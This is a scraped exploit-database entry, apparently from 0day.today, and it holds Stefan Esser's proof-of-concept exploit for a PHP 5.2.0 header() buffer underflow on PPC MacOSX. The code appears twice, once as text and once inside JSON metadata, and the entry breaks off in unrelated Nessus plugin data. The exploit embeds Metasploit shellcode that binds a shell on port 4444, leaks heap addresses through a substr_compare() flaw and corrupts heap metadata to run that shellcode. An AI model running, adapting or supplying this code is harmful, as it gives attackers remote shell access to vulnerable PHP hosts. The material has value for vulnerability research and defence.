PHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)
2007-03-19T00:00:00
ID 1337DAY-ID-7655 Type zdt Reporter Stefan Esser Modified 2007-03-19T00:00:00
Description
Exploit for macOS platform in category local exploits
===================================================================
PHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)
===================================================================
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP header() Space Trimming Buffer Underflow Vulnerability //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
// PPC MacOSX Portshell on 4444 from Metasploit
// (16 bytes added to make it compatible with unlink exploit)
$shellcode = "\x48\x00\x00\x10\x60\x00\x00\x00\x60\x00\x00\x00\x60\x00\x00\x00".
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa".
"\x38\xa5\xf8\x4a\x3c\xc0\x28\x43\x60\xc6\x84\x76\x38\x85\x07\xee".
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a".
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba".
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\x10\x23\x84\x74".
"\x10\xc3\x84\x77\x10\xe3\x84\x70\x10\x43\x84\x17\x6c\x43\x84\x74".
"\x54\x43\x86\x0e\x54\x3d\x9f\x0e\x60\x43\x84\x7b\x28\x41\x95\x2a".
"\x28\x43\x84\x76\x54\xcb\x86\xd0\x10\xe3\x84\x66\x10\x43\x84\x1e".
"\x57\x80\x77\x0e\x6c\x43\x84\x74\x54\x43\x86\x0e\x10\x43\x84\x1c".
"\x57\x80\x77\x0e\x6c\x43\x84\x74\x54\x43\x86\x0e\x57\x80\x77\x0e".
"\x10\x43\x84\x68\x10\xc3\x84\x66\xb8\xc2\x7b\x9e\x10\xe2\x7b\x9e".
"\x10\xc2\x7b\x86\x6c\x43\x84\x74\x54\x43\x86\x0e\x54\x3d\x9f\x0e".
"\x10\xe3\x84\x74\x10\x43\x84\x2c\x57\x80\x77\x0e\x54\xe7\xaf\x0e".
"\x6c\x43\x84\x74\x54\x43\x86\x0e\x10\xe6\x7b\x89\x04\x46\x7b\x89".
"\x68\xc1\x7b\x93\x10\x43\x84\x34\x6c\x43\x84\x74\x54\x43\x86\x0e".
"\x54\xe6\xae\x0f\x68\xc1\x7b\x8b\x54\x2b\x86\xd0\x10\x20\x84\x5e".
"\xb8\x22\x7b\x8e\xb8\xe2\x7b\x8a\x10\xc2\x7b\x8e\x10\x43\x84\x4d".
"\x54\x43\x80\xda\x6c\x43\x84\x74\x54\x43\x86\x0e\x57\xa3\x84\x7e".
"\x07\x21\xed\x18\x07\x20\xf7\x1e\x28\x43\x84\x76";
// Offsets used for the overwrite (will be overwritten by findOffsets()
$offset_1 = 0x55555555;
$offset_2 = 0x66666666;
findOffsets(); // Comment out if you want to just test the crash
// IF YOU OUTPUT ANYTHING THEN header() WILL FAIL
//printf("Using offsets %08x and %08x\n", $offset_1, $offset_2);
// Convert offsets into strings
$addr1 = pack("L", $offset_1);
$addr2 = pack("L", $offset_2);
// Memory Alignment stuff
$v1 = 1;
$v2 = 2;
// Block that will contain the fake memory block
$v1 = str_repeat("B", 0x110-0x14);
// Prepare fake memory header
$v1[0] = chr(0);
$v1[1] = chr(0);
$v1[2] = chr(0);
$v1[3] = chr(4);
$v1[8] = $addr1[0];
$v1[9] = $addr1[1];
$v1[10] = $addr1[2];
$v1[11] = $addr1[3];
$v1[12] = $addr2[0];
$v1[13] = $addr2[1];
$v1[14] = $addr2[2];
$v1[15] = $addr2[3];
// Heap alignment
$v2 = str_repeat("A", 400);
$v2 = str_repeat(" ", 400);
// Trigger overflow
header($v2);
unset($v2);
// This function uses the substr_compare() vulnerability
// to get the offsets. In a remote exploit such offsets
// would get bruteforced
function findOffsets()
{
global $offset_1, $offset_2, $shellcode;
// We need to NOT clear these variables,
// otherwise the heap is too segmented
global $memdump, $d, $arr;
$sizeofHashtable = 39;
$maxlong = 0x7fffffff;
// Signature of a big endian Hashtable of size 256 with 1 element
$search = "\x00\x00\x01\x00\x00\x00\x00\xff\x00\x00\x00\x01";
$memdump = str_repeat("A", 16000);
for ($i=0; $i<400; $i++) {
$d[$i]=array();
}
unset($d[350]);
$x = str_repeat("\x01", $sizeofHashtable);
unset($d[351]);
unset($d[352]);
$arr = array();
for ($i=0; $i<129; $i++) { $arr[$i] = 1; }
$arr[$shellcode] = 1;
for ($i=0; $i<129; $i++) { unset($arr[$i]); }
// If the libc memcmp leaks the information use it
// otherwise we only get a case insensitive memdump
$b = substr_compare(chr(65),chr(0),0,1,false) != 65;
for ($i=0; $i<16000; $i++) {
$y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
$Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
if ($y-$Y == 1 || $Y-$y==1){
$y = chr($y);
if ($b && strtoupper($y)!=$y) {
if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
$y = strtoupper($y);
}
}
$memdump[$i] = $y;
} else {
$y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
$Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);
if ($y-$Y != 1 && $Y-$y!=1){
$memdump[$i] = chr(1);
} else {
$memdump[$i] = chr(0);
}
}
}
// Search shellcode and hashtable and calculate memory address
$pos_shellcode = strpos($memdump, $shellcode);
$pos_hashtable = strpos($memdump, $search);
$addr = substr($memdump, $pos_hashtable+6*4, 4);
$addr = unpack("L", $addr);
// Fill in both offsets
$offset_1 = $addr[1] + 32;
$offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4 - 8;
}
?>
# 0day.today [2018-01-04] #
{"published": "2007-03-19T00:00:00", "id": "1337DAY-ID-7655", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:24:23", "bulletin": {"published": "2007-03-19T00:00:00", "id": "1337DAY-ID-7655", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.6, "modified": "2016-04-20T01:24:23"}}, "hash": "65936e4e76db2318f88281d11acf339b796f9b50ae8896d7fc47d5310a75edbb", "description": "Exploit for macOS platform in category local exploits", "type": "zdt", "lastseen": "2016-04-20T01:24:23", "edition": 1, "title": "PHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)", "href": "http://0day.today/exploit/description/7655", "modified": "2007-03-19T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/7655", "references": [], "reporter": "Stefan Esser", "sourceData": "===================================================================\r\nPHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)\r\n===================================================================\r\n\r\n\r\n\r\n<?php\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP header() Space Trimming Buffer Underflow Vulnerability //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\n // This is meant as a protection against remote file inclusion.\r\n die(\"REMOVE THIS LINE\");\r\n\r\n // PPC MacOSX Portshell on 4444 from Metasploit\r\n // (16 bytes added to make it compatible with unlink exploit)\r\n $shellcode = \"\\x48\\x00\\x00\\x10\\x60\\x00\\x00\\x00\\x60\\x00\\x00\\x00\\x60\\x00\\x00\\x00\".\r\n \"\\x7c\\xa5\\x2a\\x79\\x40\\x82\\xff\\xfd\\x7f\\xe8\\x02\\xa6\\x3b\\xff\\x07\\xfa\".\r\n \"\\x38\\xa5\\xf8\\x4a\\x3c\\xc0\\x28\\x43\\x60\\xc6\\x84\\x76\\x38\\x85\\x07\\xee\".\r\n \"\\x7c\\x89\\x03\\xa6\\x80\\x9f\\xf8\\x4a\\x7c\\x84\\x32\\x78\\x90\\x9f\\xf8\\x4a\".\r\n \"\\x7c\\x05\\xf8\\xac\\x7c\\xff\\x04\\xac\\x7c\\x05\\xff\\xac\\x3b\\xc5\\x07\\xba\".\r\n \"\\x7f\\xff\\xf2\\x15\\x42\\x20\\xff\\xe0\\x4c\\xff\\x01\\x2c\\x10\\x23\\x84\\x74\".\r\n \"\\x10\\xc3\\x84\\x77\\x10\\xe3\\x84\\x70\\x10\\x43\\x84\\x17\\x6c\\x43\\x84\\x74\".\r\n \"\\x54\\x43\\x86\\x0e\\x54\\x3d\\x9f\\x0e\\x60\\x43\\x84\\x7b\\x28\\x41\\x95\\x2a\".\r\n \"\\x28\\x43\\x84\\x76\\x54\\xcb\\x86\\xd0\\x10\\xe3\\x84\\x66\\x10\\x43\\x84\\x1e\".\r\n \"\\x57\\x80\\x77\\x0e\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\\x10\\x43\\x84\\x1c\".\r\n \"\\x57\\x80\\x77\\x0e\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\\x57\\x80\\x77\\x0e\".\r\n \"\\x10\\x43\\x84\\x68\\x10\\xc3\\x84\\x66\\xb8\\xc2\\x7b\\x9e\\x10\\xe2\\x7b\\x9e\".\r\n \"\\x10\\xc2\\x7b\\x86\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\\x54\\x3d\\x9f\\x0e\".\r\n \"\\x10\\xe3\\x84\\x74\\x10\\x43\\x84\\x2c\\x57\\x80\\x77\\x0e\\x54\\xe7\\xaf\\x0e\".\r\n \"\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\\x10\\xe6\\x7b\\x89\\x04\\x46\\x7b\\x89\".\r\n \"\\x68\\xc1\\x7b\\x93\\x10\\x43\\x84\\x34\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\".\r\n \"\\x54\\xe6\\xae\\x0f\\x68\\xc1\\x7b\\x8b\\x54\\x2b\\x86\\xd0\\x10\\x20\\x84\\x5e\".\r\n \"\\xb8\\x22\\x7b\\x8e\\xb8\\xe2\\x7b\\x8a\\x10\\xc2\\x7b\\x8e\\x10\\x43\\x84\\x4d\".\r\n \"\\x54\\x43\\x80\\xda\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\\x57\\xa3\\x84\\x7e\".\r\n \"\\x07\\x21\\xed\\x18\\x07\\x20\\xf7\\x1e\\x28\\x43\\x84\\x76\";\r\n\r\n // Offsets used for the overwrite (will be overwritten by findOffsets()\r\n $offset_1 = 0x55555555;\r\n $offset_2 = 0x66666666;\r\n\r\n findOffsets(); // Comment out if you want to just test the crash\r\n\r\n // IF YOU OUTPUT ANYTHING THEN header() WILL FAIL\r\n //printf(\"Using offsets %08x and %08x\\n\", $offset_1, $offset_2);\r\n\r\n // Convert offsets into strings\r\n $addr1 = pack(\"L\", $offset_1);\r\n $addr2 = pack(\"L\", $offset_2);\r\n \r\n // Memory Alignment stuff\r\n $v1 = 1;\r\n $v2 = 2;\r\n\r\n // Block that will contain the fake memory block\r\n $v1 = str_repeat(\"B\", 0x110-0x14);\r\n \r\n // Prepare fake memory header\r\n $v1[0] = chr(0);\r\n $v1[1] = chr(0);\r\n $v1[2] = chr(0);\r\n $v1[3] = chr(4);\r\n\r\n $v1[8] = $addr1[0];\r\n $v1[9] = $addr1[1];\r\n $v1[10] = $addr1[2];\r\n $v1[11] = $addr1[3];\r\n\r\n $v1[12] = $addr2[0];\r\n $v1[13] = $addr2[1];\r\n $v1[14] = $addr2[2];\r\n $v1[15] = $addr2[3];\r\n\r\n // Heap alignment\r\n $v2 = str_repeat(\"A\", 400);\r\n $v2 = str_repeat(\" \", 400);\r\n\r\n // Trigger overflow\r\n header($v2);\r\n\r\n unset($v2);\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n // This function uses the substr_compare() vulnerability\r\n // to get the offsets. In a remote exploit such offsets\r\n // would get bruteforced\r\n \r\n function findOffsets()\r\n {\r\n global $offset_1, $offset_2, $shellcode;\r\n // We need to NOT clear these variables,\r\n // otherwise the heap is too segmented\r\n global $memdump, $d, $arr;\r\n \r\n $sizeofHashtable = 39;\r\n $maxlong = 0x7fffffff;\r\n\r\n // Signature of a big endian Hashtable of size 256 with 1 element\r\n $search = \"\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\x01\";\r\n\r\n $memdump = str_repeat(\"A\", 16000);\r\n for ($i=0; $i<400; $i++) {\r\n\t $d[$i]=array();\r\n }\r\n unset($d[350]);\r\n $x = str_repeat(\"\\x01\", $sizeofHashtable);\r\n unset($d[351]);\r\n unset($d[352]);\r\n $arr = array();\r\n for ($i=0; $i<129; $i++) { $arr[$i] = 1; }\r\n $arr[$shellcode] = 1;\r\n for ($i=0; $i<129; $i++) { unset($arr[$i]); }\r\n\r\n // If the libc memcmp leaks the information use it\r\n // otherwise we only get a case insensitive memdump\r\n $b = substr_compare(chr(65),chr(0),0,1,false) != 65;\r\n\r\n for ($i=0; $i<16000; $i++) {\r\n $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);\r\n $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\r\n if ($y-$Y == 1 || $Y-$y==1){\r\n $y = chr($y);\r\n if ($b && strtoupper($y)!=$y) {\r\n if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {\r\n $y = strtoupper($y);\r\n }\r\n }\r\n $memdump[$i] = $y;\r\n } else {\r\n \t $y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\r\n $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);\r\n if ($y-$Y != 1 && $Y-$y!=1){\r\n\t $memdump[$i] = chr(1);\r\n } else {\r\n $memdump[$i] = chr(0);\r\n } \r\n }\r\n }\r\n \r\n // Search shellcode and hashtable and calculate memory address\r\n $pos_shellcode = strpos($memdump, $shellcode);\r\n $pos_hashtable = strpos($memdump, $search);\r\n $addr = substr($memdump, $pos_hashtable+6*4, 4);\r\n $addr = unpack(\"L\", $addr);\r\n\r\n // Fill in both offsets \r\n $offset_1 = $addr[1] + 32;\r\n $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4 - 8;\r\n }\r\n\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6b8c3c9f5e103e37c46b82a3006da6e0", "key": "title"}, {"hash": "ffe8bd05b67a518a7637c75f893f38e4", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "18f7e662d0a6a4e44c5f6f3614f11332", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "996932582b505f533c1d0f36a4603b75", "key": "href"}, {"hash": "f3f777b39acb541800cf74c686217c97", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "193d8464e18ee3c1b9d5de0c33453312", "key": "sourceData"}, {"hash": "48a81c871113bbd29f282a2b60c5b16f", "key": "description"}, {"hash": "f3f777b39acb541800cf74c686217c97", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for macOS platform in category local exploits", "hash": "a2917718171dcc85f2b40ef811a965f50c8ee93622c2e76d7d5cb4cf588e65e1", "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2018-01-04T05:04:49"}, "dependencies": {"references": [{"type": "nessus", "idList": ["FREEBSD_PKG_547FBD988B1F11E5B48BBCAEC565249C.NASL", "OPENSUSE-2015-738.NASL", "SUSE_SU-2015-1960-1.NASL", "SUSE_SU-2015-1958-1.NASL", "REDHAT-RHSA-2015-2023.NASL", "MACOSX_FLASH_PLAYER_APSB15-28.NASL", "FLASH_PLAYER_APSB15-28.NASL", "ADOBE_AIR_APSB15-28.NASL", "GOOGLE_CHROME_46_0_2490_86.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806616", "OPENVAS:1361412562310806618", "OPENVAS:1361412562310806620", "OPENVAS:1361412562310806617", "OPENVAS:1361412562310806619", "OPENVAS:1361412562310131130"]}, {"type": "cve", "idList": ["CVE-2015-8044", "CVE-2015-8046", "CVE-2015-8043", "CVE-2015-7652"]}, {"type": "redhat", "idList": ["RHSA-2015:2023"]}], "modified": "2018-01-04T05:04:49"}, "vulnersScore": 7.4}, "type": "zdt", "lastseen": "2018-01-04T05:04:49", "edition": 2, "title": "PHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)", "href": "https://0day.today/exploit/description/7655", "modified": "2007-03-19T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/7655", "references": [], "reporter": "Stefan Esser", "sourceData": "===================================================================\r\nPHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)\r\n===================================================================\r\n\r\n\r\n\r\n<?php\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP header() Space Trimming Buffer Underflow Vulnerability //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\n // This is meant as a protection against remote file inclusion.\r\n die(\"REMOVE THIS LINE\");\r\n\r\n // PPC MacOSX Portshell on 4444 from Metasploit\r\n // (16 bytes added to make it compatible with unlink exploit)\r\n $shellcode = \"\\x48\\x00\\x00\\x10\\x60\\x00\\x00\\x00\\x60\\x00\\x00\\x00\\x60\\x00\\x00\\x00\".\r\n \"\\x7c\\xa5\\x2a\\x79\\x40\\x82\\xff\\xfd\\x7f\\xe8\\x02\\xa6\\x3b\\xff\\x07\\xfa\".\r\n \"\\x38\\xa5\\xf8\\x4a\\x3c\\xc0\\x28\\x43\\x60\\xc6\\x84\\x76\\x38\\x85\\x07\\xee\".\r\n \"\\x7c\\x89\\x03\\xa6\\x80\\x9f\\xf8\\x4a\\x7c\\x84\\x32\\x78\\x90\\x9f\\xf8\\x4a\".\r\n \"\\x7c\\x05\\xf8\\xac\\x7c\\xff\\x04\\xac\\x7c\\x05\\xff\\xac\\x3b\\xc5\\x07\\xba\".\r\n \"\\x7f\\xff\\xf2\\x15\\x42\\x20\\xff\\xe0\\x4c\\xff\\x01\\x2c\\x10\\x23\\x84\\x74\".\r\n \"\\x10\\xc3\\x84\\x77\\x10\\xe3\\x84\\x70\\x10\\x43\\x84\\x17\\x6c\\x43\\x84\\x74\".\r\n \"\\x54\\x43\\x86\\x0e\\x54\\x3d\\x9f\\x0e\\x60\\x43\\x84\\x7b\\x28\\x41\\x95\\x2a\".\r\n \"\\x28\\x43\\x84\\x76\\x54\\xcb\\x86\\xd0\\x10\\xe3\\x84\\x66\\x10\\x43\\x84\\x1e\".\r\n \"\\x57\\x80\\x77\\x0e\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\\x10\\x43\\x84\\x1c\".\r\n \"\\x57\\x80\\x77\\x0e\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\\x57\\x80\\x77\\x0e\".\r\n \"\\x10\\x43\\x84\\x68\\x10\\xc3\\x84\\x66\\xb8\\xc2\\x7b\\x9e\\x10\\xe2\\x7b\\x9e\".\r\n \"\\x10\\xc2\\x7b\\x86\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\\x54\\x3d\\x9f\\x0e\".\r\n \"\\x10\\xe3\\x84\\x74\\x10\\x43\\x84\\x2c\\x57\\x80\\x77\\x0e\\x54\\xe7\\xaf\\x0e\".\r\n \"\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\\x10\\xe6\\x7b\\x89\\x04\\x46\\x7b\\x89\".\r\n \"\\x68\\xc1\\x7b\\x93\\x10\\x43\\x84\\x34\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\".\r\n \"\\x54\\xe6\\xae\\x0f\\x68\\xc1\\x7b\\x8b\\x54\\x2b\\x86\\xd0\\x10\\x20\\x84\\x5e\".\r\n \"\\xb8\\x22\\x7b\\x8e\\xb8\\xe2\\x7b\\x8a\\x10\\xc2\\x7b\\x8e\\x10\\x43\\x84\\x4d\".\r\n \"\\x54\\x43\\x80\\xda\\x6c\\x43\\x84\\x74\\x54\\x43\\x86\\x0e\\x57\\xa3\\x84\\x7e\".\r\n \"\\x07\\x21\\xed\\x18\\x07\\x20\\xf7\\x1e\\x28\\x43\\x84\\x76\";\r\n\r\n // Offsets used for the overwrite (will be overwritten by findOffsets()\r\n $offset_1 = 0x55555555;\r\n $offset_2 = 0x66666666;\r\n\r\n findOffsets(); // Comment out if you want to just test the crash\r\n\r\n // IF YOU OUTPUT ANYTHING THEN header() WILL FAIL\r\n //printf(\"Using offsets %08x and %08x\\n\", $offset_1, $offset_2);\r\n\r\n // Convert offsets into strings\r\n $addr1 = pack(\"L\", $offset_1);\r\n $addr2 = pack(\"L\", $offset_2);\r\n \r\n // Memory Alignment stuff\r\n $v1 = 1;\r\n $v2 = 2;\r\n\r\n // Block that will contain the fake memory block\r\n $v1 = str_repeat(\"B\", 0x110-0x14);\r\n \r\n // Prepare fake memory header\r\n $v1[0] = chr(0);\r\n $v1[1] = chr(0);\r\n $v1[2] = chr(0);\r\n $v1[3] = chr(4);\r\n\r\n $v1[8] = $addr1[0];\r\n $v1[9] = $addr1[1];\r\n $v1[10] = $addr1[2];\r\n $v1[11] = $addr1[3];\r\n\r\n $v1[12] = $addr2[0];\r\n $v1[13] = $addr2[1];\r\n $v1[14] = $addr2[2];\r\n $v1[15] = $addr2[3];\r\n\r\n // Heap alignment\r\n $v2 = str_repeat(\"A\", 400);\r\n $v2 = str_repeat(\" \", 400);\r\n\r\n // Trigger overflow\r\n header($v2);\r\n\r\n unset($v2);\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n // This function uses the substr_compare() vulnerability\r\n // to get the offsets. In a remote exploit such offsets\r\n // would get bruteforced\r\n \r\n function findOffsets()\r\n {\r\n global $offset_1, $offset_2, $shellcode;\r\n // We need to NOT clear these variables,\r\n // otherwise the heap is too segmented\r\n global $memdump, $d, $arr;\r\n \r\n $sizeofHashtable = 39;\r\n $maxlong = 0x7fffffff;\r\n\r\n // Signature of a big endian Hashtable of size 256 with 1 element\r\n $search = \"\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\x01\";\r\n\r\n $memdump = str_repeat(\"A\", 16000);\r\n for ($i=0; $i<400; $i++) {\r\n\t $d[$i]=array();\r\n }\r\n unset($d[350]);\r\n $x = str_repeat(\"\\x01\", $sizeofHashtable);\r\n unset($d[351]);\r\n unset($d[352]);\r\n $arr = array();\r\n for ($i=0; $i<129; $i++) { $arr[$i] = 1; }\r\n $arr[$shellcode] = 1;\r\n for ($i=0; $i<129; $i++) { unset($arr[$i]); }\r\n\r\n // If the libc memcmp leaks the information use it\r\n // otherwise we only get a case insensitive memdump\r\n $b = substr_compare(chr(65),chr(0),0,1,false) != 65;\r\n\r\n for ($i=0; $i<16000; $i++) {\r\n $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);\r\n $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\r\n if ($y-$Y == 1 || $Y-$y==1){\r\n $y = chr($y);\r\n if ($b && strtoupper($y)!=$y) {\r\n if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {\r\n $y = strtoupper($y);\r\n }\r\n }\r\n $memdump[$i] = $y;\r\n } else {\r\n \t $y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\r\n $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);\r\n if ($y-$Y != 1 && $Y-$y!=1){\r\n\t $memdump[$i] = chr(1);\r\n } else {\r\n $memdump[$i] = chr(0);\r\n } \r\n }\r\n }\r\n \r\n // Search shellcode and hashtable and calculate memory address\r\n $pos_shellcode = strpos($memdump, $shellcode);\r\n $pos_hashtable = strpos($memdump, $search);\r\n $addr = substr($memdump, $pos_hashtable+6*4, 4);\r\n $addr = unpack(\"L\", $addr);\r\n\r\n // Fill in both offsets \r\n $offset_1 = $addr[1] + 32;\r\n $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4 - 8;\r\n }\r\n\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-04] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "48a81c871113bbd29f282a2b60c5b16f", "key": "description"}, {"hash": "aa6b6f226d6cc9d835252c43611b4d38", "key": "href"}, {"hash": "f3f777b39acb541800cf74c686217c97", "key": "modified"}, {"hash": "f3f777b39acb541800cf74c686217c97", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ffe8bd05b67a518a7637c75f893f38e4", "key": "reporter"}, {"hash": "1b28da2403ef5c9e466db5e652d0d5e1", "key": "sourceData"}, {"hash": "8e7bd4bc67f200856c84ef8e69537a23", "key": "sourceHref"}, {"hash": "6b8c3c9f5e103e37c46b82a3006da6e0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"nessus": [{"lastseen": "2019-11-01T02:37:47", "bulletinFamily": "scanner", "description": "Adobe reports :\n\nThese updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2015-7659).\n\nThese updates resolve a security bypass vulnerability that could be\nexploited to write arbitrary data to the file system under user\npermissions (CVE-2015-7662).\n\nThese updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2015-7651, CVE-2015-7652, CVE-2015-7653,\nCVE-2015-7654, CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\nCVE-2015-7658, CVE-2015-7660, CVE-2015-7661, CVE-2015-7663,\nCVE-2015-8042, CVE-2015-8043, CVE-2015-8044, CVE-2015-8046).", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_547FBD988B1F11E5B48BBCAEC565249C.NASL", "href": "https://www.tenable.com/plugins/nessus/86878", "published": "2015-11-16T00:00:00", "title": "FreeBSD : flash -- multiple vulnerabilities (547fbd98-8b1f-11e5-b48b-bcaec565249c)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86878);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2018/11/10 